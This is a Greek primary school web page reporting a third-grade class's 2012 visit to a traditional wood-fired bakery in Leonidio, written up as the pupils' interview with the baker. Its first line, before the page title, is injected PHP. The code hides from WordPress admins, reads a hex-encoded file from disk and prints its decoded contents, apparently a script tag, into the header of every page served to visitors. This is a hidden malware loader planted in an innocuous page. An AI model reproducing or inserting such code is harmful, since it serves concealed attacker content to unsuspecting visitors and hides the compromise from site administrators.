if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Η επίσκεψη μας σ’ ένα παραδοσιακό φούρνο του Λεωνιδίου |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Η επίσκεψη μας σ’ ένα παραδοσιακό φούρνο του Λεωνιδίου

Στις 26/5/12 η Γ΄ τάξη του Δημοτικού Σχολείου Λεωνιδίου επισκέφθηκε τον παραδοσιακό φούρνο του κ. Αντρέα Βλάμη, που βρίσκεται στον τόπο μας.
Σκοπός της επίσκεψης ήταν να ενημερωθούν οι μαθητές για τη λειτουργία του φούρνου και τη διαδικασία παραγωγής ψωμιού με αφορμή την ενότητα της Γλώσσας «Του κόσμου το ψωμί».
Κρατώντας σημειωματάριο και μολύβι κι έχοντας το ρόλο δημοσιογράφου τα παιδιά άρχισαν τις ερωτήσεις.

Μαθητές: Ποιος σας έμαθε να φτιάχνετε ψωμί;
Αρτοποιός: Έμαθα την τέχνη του αρτοποιού από τον πατέρα μου. Γεννήθηκα και μεγάλωσα σ? αυτό το φούρνο και μ? αρέσει η επικοινωνία με τον κόσμο.

Μαθητές: Τι ώρα ξυπνάτε για να φτιάξετε το ψωμί;
Αρτοποιός: Ξυπνάω στις 3 η ώρα τη νύχτα για να αρχίσω την παρασκευή ψωμιού.

Μαθητές: Τι υλικά χρησιμοποιείτε για να φτιάξετε το ψωμί;
Αρτοποιός: Χρησιμοποιώ αλεύρι, μαγιά, αλάτι και νερό. Για να φτιάξουμε 90 κιλά ψωμί χρειαζόμαστε 70 κιλά αλεύρι, 600 γρ αλάτι και 38 λίτρα νερό περίπου. Το χειμώνα το νερό είναι χλιαρό και το καλοκαίρι κρύο. Το αλάτι το βάζουμε για να κρατά το ζυμάρι σφιχτό.

Μαθητές: Ποια είναι η διαδικασία παρασκευής ψωμιού;
Αρτοποιός: Αφού ζυγίσουμε τα υλικά, τα ρίχνουμε σε ένα μηχάνημα που λέγεται ζυμωτήριο και ζυμώνουμε για 20 λεπτά. Μετά τοποθετούμε το ζυμάρι στη σκάφη και το αφήνουμε για 15-20 λεπτά για να ξεκουραστεί. Έπειτα το χωρίζουμε σε κομμάτια που τα ζυγίζουμε και τα βάζουμε σε ένα άλλο μηχάνημα, την πλαστική. Από εκεί βγαίνουν φραντζόλες, καρβέλια και φραντζολάκια, έτοιμα για ψήσιμο.

Μαθητές: Πόσο χρόνο χρειάζεστε για να φτιάξετε το ψωμί;
Αρτοποιός: Η παρασκευή ψωμιού διαρκεί συνολικά 3,5 ώρες.

Μαθητές: Τι κάνετε το ψωμί που σας μένει απούλητο;
Αρτοποιός: Το ψωμί που μένει απούλητο το δίνω στους πελάτες, αφού πρώτα τους ενημερώσω ότι είναι χθεσινό ή το δίνω σε φτωχές οικογένειες. Πάντως φροντίζω να φτιάχνω τόσο ψωμί όσο μπορώ να πουλήσω.

Μαθητές: Τι άλλα προϊόντα φτιάχνετε;
Αρτοποιός: Φτιάχνουμε κουλουράκια, τυρόπιτες, ζαμπονοτυρόπιτες, παξιμάδια και μουστοκούλουρα.

Μαθητές: Από πού προμηθεύεστε το αλεύρι που χρησιμοποιείτε;
Αρτοποιός: Αγοράζω το αλεύρι από αλευρόμυλο που βρίσκεται στο Βόλο.

Μαθητές: Πώς λειτουργεί ο φούρνος;
Αρτοποιός: Λειτουργεί με ξύλα.

Μαθητές: Πότε έχετε περισσότερη δουλειά;
Αρτοποιός: Δουλειά έχουμε όλο το χρόνο αλλά τις γιορτές η κίνηση είναι περισσότερη. Την Καθαρή Δευτέρα φτιάχνουμε λαγάνες, τα Χριστούγεννα και το Πάσχα κάνουμε γλυκά. Ακόμα ψήνουμε και τα φαγητά που μας φέρνουν οι νοικοκυρές.

Μαθητές: Έχετε πολλά χρόνια το φούρνο;
Αρτοποιός: Αυτός ο φούρνος έχει μεγάλη ιστορία. Λειτουργεί από το 1920 και ο πρώτος ιδιοκτήτης λεγόταν Τρούμπας Βασίλειος. Το 1958 τον ανέλαβε ο πατέρας μου ο Φίλιππας Βλάμης και από το 1992 ανέλαβα εγώ τη λειτουργία του φούρνου.

Οι μαθητές και οι δασκάλες της Γ΄ τάξης ευχαριστούν θερμά τον κ. Αντρέα Βλάμη για το χρόνο που αφιέρωσε για να μας ξεναγήσει στο φούρνο του, για τις πληροφορίες που μας έδωσε και για τα νοστιμότατα φραντζολάκια του.